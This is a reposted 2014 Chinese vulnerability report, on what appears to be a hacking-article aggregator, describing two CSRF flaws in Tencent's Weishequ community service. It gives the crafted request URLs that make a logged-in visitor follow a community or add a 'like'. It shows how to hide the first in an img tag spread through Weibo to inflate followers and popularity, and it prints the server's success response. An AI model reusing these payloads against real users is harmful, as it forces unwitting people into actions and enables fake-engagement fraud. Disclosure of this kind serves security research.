记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

腾讯微社区CSRF漏洞2枚(可以刷粉丝和人气)

2014-06-13 04:15

第一个CSRF漏洞(刷粉丝):



利用CSRF构造好的URL:(其中key为指定社区的id)



http://wsq.qq.com/reflow/follow?resType=json&isAjax=1&key=226216966



中招CSRF后,会成功加入,可以用来刷成员刷人气刷粉丝、

利用可以用<img src=http://wsq.qq.com/reflow/follow?resType=json&isAjax=1&key=226216966>

之类的通过微博刷。。。



QQ截图20140428201222.jpg





第二个CSRF漏洞(刷人气):



利用URL

http://mq.wsq.qq.com/226216966/like?tId=11&resType=json&isAjax=1&_=1398405189497





返回成功数据

{"errCode":0,"message":"\u5df2\u9876","data":{"likeNumber":2},"showLogin":null,"jumpURL":null,"locationTime":2000}





可以用来刷“赞(顶)” 就是刷那个大拇指的数量

漏洞证明:

如上

修复方案:

求忽略!


知识来源: www.wooyun.org/bugs/wooyun-2014-058804

阅读:162180 | 评论:0 | 标签:CSRF 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“腾讯微社区CSRF漏洞2枚(可以刷粉丝和人气)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁